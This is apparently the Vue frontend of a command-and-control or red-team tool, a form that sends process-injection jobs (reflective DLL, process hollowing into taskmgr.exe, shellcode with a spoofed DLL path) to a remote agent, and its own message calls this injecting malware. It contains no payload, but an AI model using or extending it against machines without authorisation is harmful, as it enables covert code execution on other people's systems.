<template>
  <main class="mx-auto mt-4 w-full max-w-5xl space-y-6">
    <header class="border-b border-base-300 pb-4">
      <div class="flex flex-wrap items-center justify-between gap-3">
        <div>
          <p class="text-xs font-semibold uppercase tracking-[0.18em] text-primary">Process action</p>
          <h1 class="mt-1 text-2xl font-bold">Tạo yêu cầu inject</h1>
          <p class="mt-1 max-w-2xl text-sm text-base-content/65">Chọn tiến trình, cấu hình phương thức và cung cấp module cần thiết. Yêu cầu được gửi tới agent đang quản lý tiến trình.</p>
        </div>
        <RouterLink class="btn btn-outline" :to="{ name: 'ClientInject' }">Lịch sử inject</RouterLink>
      </div>
    </header>

    <section class="grid gap-5 rounded-lg border border-base-300 bg-base-100 p-5 md:grid-cols-2">
      <fieldset class="fieldset">
        <legend class="fieldset-legend">PID tiến trình <span class="text-error">*</span></legend>
        <input
          v-model="processPid"
          type="text"
          inputmode="numeric"
          class="input input-bordered w-full font-mono"
          placeholder="PID tiến trình"
          autocomplete="off"
          aria-describedby="process-pid-help"
        />
        <p id="process-pid-help" class="label text-xs">PID của tiến trình mục tiêu.</p>
      </fieldset>
      <fieldset class="fieldset">
        <legend class="fieldset-legend">Phương thức <span class="text-error">*</span></legend>
        <select v-model="injectType" class="select select-bordered w-full">
          <option value="reflective_dll">Reflective DLL</option>
          <option value="process_hollowing">Process Hollowing</option>
        </select>
        <p class="label text-xs">Các trường bên dưới thay đổi theo phương thức.</p>
      </fieldset>
    </section>

    <section class="rounded-lg border border-base-300 bg-base-100 p-5">
      <div class="mb-4">
        <h2 class="font-semibold">Cấu hình phương thức</h2>
        <p class="text-sm text-base-content/60">Chỉ các giá trị của phương thức đang chọn mới được gửi.</p>
      </div>
    <!-- Reflective DLL fields -->
    <div v-if="injectType === 'reflective_dll'" class="flex flex-col gap-3 md:flex-row">
      <div class="flex-1">
        <label class="label">
          <span class="label-text font-bold">Tên hàm export</span>
        </label>
        <label class="input input-bordered w-full">
          <i class="fa-solid fa-code join-item text-base-content/60"></i>
          <input
            type="text"
            placeholder="DllMain"
            v-model="exportName"
          />
        </label>
      </div>
    </div>

    <!-- Masquerading fields -->
    <div v-if="injectType === 'masquerading'" class="flex flex-col gap-3 md:flex-row">
      <div class="flex-1">
        <label class="label">
          <span class="label-text font-bold">Shellcode (base64)</span>
        </label>
        <label class="input input-bordered w-full font-mono text-sm">
          <i class="fa-solid fa-code join-item text-base-content/60"></i>
          <input
            type="text"
            placeholder="U0dIVFRBVF9TRUxIQ09ERUQ9"
            v-model="shellcodeB64"
          />
        </label>
      </div>
      <div class="flex-1">
        <label class="label">
          <span class="label-text font-bold">Đường dẫn DLL giả mạo</span>
        </label>
        <label class="input input-bordered w-full">
          <i class="fa-solid fa-folder-open join-item text-base-content/60"></i>
          <input
            type="text"
            placeholder="C:\Windows\System32\msvcrt.dll"
            v-model="spoofPath"
          />
        </label>
      </div>
    </div>

    <!-- Process Hollowing fields -->
    <div v-if="injectType === 'process_hollowing'" class="flex flex-col gap-3 md:flex-row">
      <div class="flex-1">
        <label class="label">
          <span class="label-text font-bold">Đường dẫn file mục tiêu</span>
        </label>
        <label class="input input-bordered w-full">
          <i class="fa-solid fa-folder-open join-item text-base-content/60"></i>
          <input
            type="text"
            placeholder="C:\Windows\System32\taskmgr.exe"
            v-model="path"
          />
        </label>
      </div>
    </div>

    </section>

    <section v-if="injectType === 'reflective_dll' || injectType === 'process_hollowing'" class="space-y-3 rounded-lg border border-base-300 bg-base-100 p-5">
      <div>
        <h2 class="font-semibold">{{ injectType === "process_hollowing" ? "Module Inject (EXE)" : "Module Inject (DLL)" }}</h2>
        <p class="text-sm text-base-content/60">{{ source === "machine" ? "Chọn module từ máy này." : "Chọn một module đã lưu." }}</p>
      </div>
      <div class="flex flex-wrap gap-2" role="radiogroup" aria-label="Nguồn module">
        <label class="flex cursor-pointer items-center gap-2 rounded border border-base-300 px-3 py-2">
          <input type="radio" v-model="source" value="machine" class="radio radio-primary radio-sm" />
          <span class="text-sm">Tải từ máy</span>
        </label>
        <label class="flex cursor-pointer items-center gap-2 rounded border border-base-300 px-3 py-2">
          <input type="radio" v-model="source" value="saved" class="radio radio-primary radio-sm" />
          <span class="text-sm">Dùng file đã lưu</span>
        </label>
      </div>

      <section v-if="source === 'machine'" class="rounded border border-dashed border-base-300 p-4">
        <input type="file" class="file-input file-input-bordered w-full" :accept="injectType === 'process_hollowing' ? '.exe' : '.dll'" @change="on_file_selected" />
        <p v-if="selected_file" class="mt-2 truncate text-sm text-base-content/70">
          Đã chọn: {{ selected_file.name }} — {{ format_size(selected_file.size) }}
        </p>
        <p v-else class="mt-2 text-xs text-base-content/60">Chưa chọn file.</p>
      </section>

      <section v-if="source === 'saved'" class="space-y-2">
        <input type="search" class="input input-bordered w-full" placeholder="Tìm module đã lưu..." aria-label="Tìm module đã lưu" @input="on_keyword_input" />
        <div class="max-h-56 overflow-auto rounded border border-base-300">
          <p v-if="saved_modules.length === 0" class="p-4 text-sm text-base-content/60">Không tìm thấy module đã lưu.</p>
          <button
            v-for="v in saved_modules"
            :key="String(v.id)"
            type="button"
            class="flex w-full items-center justify-between border-b border-base-300 px-4 py-3 text-left last:border-0 hover:bg-base-200"
            :class="{ 'bg-primary/10': selected_module_id === String(v.id) }"
            :aria-pressed="selected_module_id === String(v.id)"
            @click="select_saved_version(v)"
          >
            <span class="min-w-0">
              <span class="block truncate font-medium">{{ v.filename ?? "Không có tên file" }}</span>
              <span v-if="v.description" class="block truncate text-xs text-base-content/60">{{ v.description }}</span>
            </span>
            <span v-if="selected_module_id === String(v.id)" class="badge badge-primary">Đã chọn</span>
          </button>
        </div>
      </section>
    </section>

    <div class="flex justify-end">
      <button
        class="btn btn-primary"
        @click="submitInject"
        :disabled="!isFormValid"
      >
        Gửi yêu cầu
      </button>
    </div>

    <section v-if="result" class="rounded-lg border p-5" :class="resultClass" aria-live="polite">
      <div class="flex flex-wrap items-center justify-between gap-3">
        <div>
          <p class="text-xs font-semibold uppercase tracking-wide opacity-70">Kết quả yêu cầu</p>
          <p class="mt-1 font-semibold">{{ statusBadgeText }}</p>
        </div>
        <span class="badge" :class="statusBadgeClass">{{ result.status }}</span>
      </div>
      <p class="mt-3 break-all text-xs"><span class="font-semibold">Action ID:</span> <code>{{ result.action_id }}</code></p>
      <p v-if="result.message" class="mt-2 text-sm">{{ result.message }}</p>
      <p v-if="polling" class="mt-3 text-xs opacity-70"><i class="fa-solid fa-circle-notch fa-spin" aria-hidden="true"></i> Đang cập nhật trạng thái mỗi 5 giây…</p>
    </section>
  </main>
</template>

<script setup lang="ts">
import { computed, onBeforeMount, onBeforeUnmount, ref, watch } from "vue";
import { router } from "@/router/router";
import { axios_instance } from "@/api/api";
import { toast } from "vue3-toastify";
import {
  createInjectAction,
  file_to_module_b64,
  injectFormValid,
  injectModuleType,
  listInjectModules,
} from "@/api/action";
import type { SavedVersion } from "@/api/action";

// Form state
const processPid = ref<string>("");
const injectType = ref<"reflective_dll" | "masquerading" | "process_hollowing">("reflective_dll");
const exportName = ref<string>("");
const shellcodeB64 = ref<string>("");
const spoofPath = ref<string>("");
const path = ref<string>("");

// ponytail: module source mirrors ElevateButton — "machine" uploads a DLL as an
// new inject Version record (module_b64), "saved" reuses one via version_id.
const source = ref<"machine" | "saved">("machine");
const selected_file = ref<File | null>(null);
const saved_modules = ref<SavedVersion[]>([]);
const selected_module_id = ref("");
let keyword_timer: ReturnType<typeof setTimeout> | null = null;

// ponytail: the module picker only applies to types that need a DLL, so the
// whole block is gated here and the required-field check below excludes it.

// Result state
type InjectStatus = "pending" | "complete" | "error";
const result = ref<{ action_id: string; message: string; status: InjectStatus } | null>(null);
const polling = ref(false);

// ponytail: plain setInterval for polling — no external deps needed.
const pollTimer = ref<NodeJS.Timeout | null>(null);

// Pre-fill process PID when opened from the Process dropdown (query param).
onBeforeMount(() => {
  const pid = router.currentRoute.value.query.pid;
  if (typeof pid === "string" && pid) processPid.value = pid;
});

// ponytail: clear the leak before the component is destroyed on navigation.
onBeforeUnmount(() => {
  if (pollTimer.value) clearInterval(pollTimer.value);
  if (keyword_timer) clearTimeout(keyword_timer);
});

// ponytail: saved-modules list loads only when the user actually opens that
// source — avoids a needless API call per type switch on the default upload tab.
watch(source, (src) => {
  if (src === "saved") load_saved_modules();
});

// ponytail: switching inject type is a fresh action; drop any prior module so
// the form can't submit with a stale reuse-id from an unrelated type bucket.
watch(injectType, () => {
  selected_module_id.value = "";
  source.value = "machine";
  selected_file.value = null;
});

const isFormValid = computed(() => {
  if (!processPid.value) return false;
  const base = injectFormValid({
    type: injectType.value,
    exportName: exportName.value,
    shellcodeB64: shellcodeB64.value,
    spoofPath: spoofPath.value,
    path: path.value,
  });
  if (!base) return false;
  // ponytail: reflective_dll/process_hollowing need an inject DLL — either an
  // upload or a saved reuse. Masquerading keeps shellcode inline and needs none.
  const needs_module = injectType.value === "reflective_dll" || injectType.value === "process_hollowing";
  if (!needs_module) return true;
  if (source.value === "machine") return !!selected_file.value;
  return !!selected_module_id.value;
});

const module_type = computed(() => injectModuleType[injectType.value]);

const format_size = (bytes: number): string => {
  if (bytes < 1024) return `${bytes} B`;
  if (bytes < 1024 * 1024) return `${(bytes / 1024).toFixed(1)} KB`;
  return `${(bytes / (1024 * 1024)).toFixed(1)} MB`;
};

// ponytail: module picker loads lazily when the user opens the "saved" source,
// scoped to one inject type — never the generic version list. The backend
// filter accepts a list of types, so current + legacy buckets come together.
const load_saved_modules = async (keyword?: string) => {
  saved_modules.value = await listInjectModules({ types: module_type.value, keyword });
};

const on_file_selected = (e: Event) => {
  const target = e.target as HTMLInputElement;
  selected_file.value = target.files?.[0] ?? null;
};

const select_saved_version = (v: Record<string, unknown>) => {
  selected_module_id.value = String(v.id);
};

const on_keyword_input = (e: Event) => {
  const kw = (e.target as HTMLInputElement).value.trim();
  if (keyword_timer) clearTimeout(keyword_timer);
  keyword_timer = setTimeout(() => load_saved_modules(kw || undefined), 300);
};

const statusBadgeClass = computed(() => ({
  "badge-neutral": result.value?.status === "pending",
  "badge-success": result.value?.status === "complete",
  "badge-error": result.value?.status === "error",
}));

const statusBadgeText = computed(() => {
  switch (result.value?.status) {
    case "pending": return "Đang xử lý...";
    case "complete": return "Hoàn thành";
    case "error": return "Lỗi";
  }
});

const resultClass = computed(() => ({
  "bg-base-200 border-base-300": result.value?.status === "pending",
  "bg-green-50 border-green-300 text-green-800": result.value?.status === "complete",
  "bg-red-50 border-red-300 text-red-800": result.value?.status === "error",
}));

const submitInject = async () => {
  if (!isFormValid.value) return;

  const payload: Parameters<typeof createInjectAction>[0] = {
    agent_id: String(router.currentRoute.value.params.client_id),
    pid: processPid.value,
    inject_type: injectType.value,
  };
  if (injectType.value === "reflective_dll") payload.export_name = exportName.value;
  if (injectType.value === "masquerading") {
    payload.shellcode_b64 = shellcodeB64.value;
    payload.spoof_path = spoofPath.value;
  }
  if (injectType.value === "process_hollowing") {
    payload.path = path.value;
  }

  // ponytail: pass the resolved module — upload as base64, or reuse by id.
  const needs_module = injectType.value === "reflective_dll" || injectType.value === "process_hollowing";
  if (needs_module) {
    if (source.value === "machine") {
      payload.module_b64 = await file_to_module_b64(selected_file.value as File);
      payload.original_file_name = selected_file.value?.name;
    } else {
      payload.version_id = selected_module_id.value;
    }
  }

  try {
    const response = await createInjectAction(payload);
    result.value = {
      action_id: response.data.action_id,
      message: response.data.message,
      status: "pending",
    };
    pollTimer.value = setInterval(pollResult, 5000);
    polling.value = true;
    toast.success("Yêu cầu tiêm mã độc đã được tạo!");
  } catch (err) {
    const data = (err as { response?: { data?: { message?: unknown; error?: unknown } } })?.response?.data;
    if (data?.error === "not found" || data?.message === "process not found") {
      toast.error("Không tìm thấy tiến trình với PID này. Vui lòng kiểm tra PID và thử lại.");
      return;
    }
    if (data?.error === "shellcode_b64 is required and must be valid base64" || data?.message === "shellcode_b64 is required and must be valid base64") {
      toast.error("Shellcode Base64 không hợp lệ. Hãy nhập shellcode đầy đủ và đúng định dạng Base64.");
      return;
    }
    const serverMessage = data?.message ?? data?.error;
    const msg = typeof serverMessage === "string" ? serverMessage : err instanceof Error ? err.message : "Không thể gửi yêu cầu.";
    toast.error(msg);
  }
};

// ponytail: poll the view-side action detail (GET /view/action/{id}) —
// the agent-side /agent/ij upload only changes status, this reads it back.
const pollResult = async () => {
  if (!result.value || !result.value.action_id) return;
  try {
    const response = await axios_instance.get<{ data: { status: string; log?: string } }>(
      `/api/v1/view/action/${result.value.action_id}`,
    );
    const { status, log } = response.data.data;
    result.value.status = status as InjectStatus;
    if (status === "error") {
      result.value.message = log || "Agent báo inject thất bại nhưng không gửi chi tiết lỗi.";
    }
    if (status === "complete" || status === "error") {
      polling.value = false;
      if (pollTimer.value) clearInterval(pollTimer.value);
    }
  } catch (err) {
    console.error("Poll failed:", err);
  }
};
</script>